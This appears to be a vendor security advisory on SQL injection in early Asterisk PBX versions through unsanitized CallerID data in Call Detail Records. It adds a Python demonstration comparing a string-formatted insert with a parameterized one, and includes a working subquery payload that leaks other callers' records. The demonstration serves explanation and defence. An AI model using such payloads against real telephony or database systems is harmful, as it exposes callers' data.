J-Security Center

Title: Asterisk CallerID Call Detail Records SQL Injection Vulnerability

Severity: HIGH

Description:

Asterisk is an open-source software PBX that runs on Linux. It supports a range of telephony protocols, including SIP, IAX versions 1 and 2, and H.323. Through its CDR backend modules it can write call records to a relational database.

Call Detail Records (CDRs) are the per-call log a PBX keeps for billing and accounting. Each record holds data supplied by the call itself, including the CallerID presented by the calling party.

Asterisk is prone to SQL injection through malformed CDR data. The CallerID string is not sanitized before it is written into the CDR, so a CallerID containing SQL metacharacters (for example a single quote) is placed verbatim into the SQL statement that stores the record. An attacker can use this to alter the logic of that statement, read or modify other records in the CDR database, or attack the underlying database engine with the privileges of the account Asterisk uses to log CDRs. Other attacks may also be possible.

To exploit this issue an attacker only needs to control the CallerID presented with a call. With SIP and IAX the CallerID is a caller-supplied field in the call setup, so any peer or trunk that can place a call into the vulnerable system and set its own CallerID can reach the flaw without any access to the database itself.
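The following is an added illustration of the bug class, not Asterisk's own code or schema: a simplified CDR table in SQLite, a CDR insert built by string formatting (the pattern the advisory describes) beside the same insert with bound parameters, and a constructed CallerID that closes the quoted literal and splices in a subquery. The column names, the seeded record and the payload are all assumptions made for the example.

```python
import sqlite3

# Constructed, simplified CDR table: a subset of the fields a CDR carries.
# This is not Asterisk's own schema.
SCHEMA = """
CREATE TABLE cdr (
    calldate    TEXT,
    clid        TEXT,
    src         TEXT,
    dst         TEXT,
    duration    INTEGER,
    disposition TEXT
)
"""


def fresh_db():
    """In-memory database seeded with one legitimate (constructed) call record."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.execute(
        "INSERT INTO cdr VALUES (?, ?, ?, ?, ?, ?)",
        ("2003-01-01 10:00:00", '"Alice" <1001>', "1001", "2002", 42, "ANSWERED"),
    )
    conn.commit()
    return conn


def insert_cdr_vulnerable(conn, clid, src, dst, duration, disposition):
    """Build the INSERT by string formatting.

    The CallerID is pasted straight into the SQL text, so a quote in it ends
    the string literal and whatever follows is parsed as SQL. This is the
    unsanitized pattern the advisory describes (hypothetical code, not Asterisk's).
    """
    sql = (
        "INSERT INTO cdr (calldate, clid, src, dst, duration, disposition) "
        "VALUES ('2003-01-02 09:00:00', '%s', '%s', '%s', %d, '%s')"
        % (clid, src, dst, duration, disposition)
    )
    conn.execute(sql)
    conn.commit()


def insert_cdr_safe(conn, clid, src, dst, duration, disposition):
    """Same insert with bound parameters.

    The driver passes the CallerID as data, never as SQL text, so it is stored
    exactly as received no matter which characters it contains.
    """
    conn.execute(
        "INSERT INTO cdr (calldate, clid, src, dst, duration, disposition) "
        "VALUES ('2003-01-02 09:00:00', ?, ?, ?, ?, ?)",
        (clid, src, dst, duration, disposition),
    )
    conn.commit()


def stored_clids(conn):
    """All clid values in insertion order."""
    return [row[0] for row in conn.execute("SELECT clid FROM cdr ORDER BY rowid")]


# Constructed attacker CallerID, as it could be sent in a SIP From header or an
# IAX call setup. It closes the literal, concatenates a subquery over the
# existing records, and reopens the literal so the statement still parses.
EVIL_CLID = "' || (SELECT group_concat(clid, ';') FROM cdr) || '"


def demo():
    """Run the attacker's CallerID through both insert paths.

    Returns (clid stored by the vulnerable path, clid stored by the safe path).
    The vulnerable path stores the CallerIDs of earlier calls instead of the
    string it was given; the safe path stores the payload literally.
    """
    conn = fresh_db()
    insert_cdr_vulnerable(conn, EVIL_CLID, "1002", "2002", 5, "ANSWERED")
    leaked = stored_clids(conn)[-1]

    conn2 = fresh_db()
    insert_cdr_safe(conn2, EVIL_CLID, "1002", "2002", 5, "ANSWERED")
    literal = stored_clids(conn2)[-1]
    return leaked, literal


if __name__ == "__main__":
    leaked, literal = demo()
    print("vulnerable path stored:", leaked)
    print("parameterized path stored:", literal)
```

The subquery form is used deliberately: it needs no stacked statements, so it works even against drivers that refuse more than one statement per call, and it turns the attacker's own CDR row into an exfiltration channel for other callers' CallerID data. Against a real deployment the same CallerID would reach the database through whichever CDR backend Asterisk is configured to use.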

Affected Products:

  • Asterisk Asterisk 0.1.7
  • Asterisk Asterisk 0.1.8
  • Asterisk Asterisk 0.1.9
  • Asterisk Asterisk 0.1.9 -1
  • Asterisk Asterisk 0.2.0
  • Asterisk Asterisk 0.3.0
  • Asterisk Asterisk 0.4.0

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.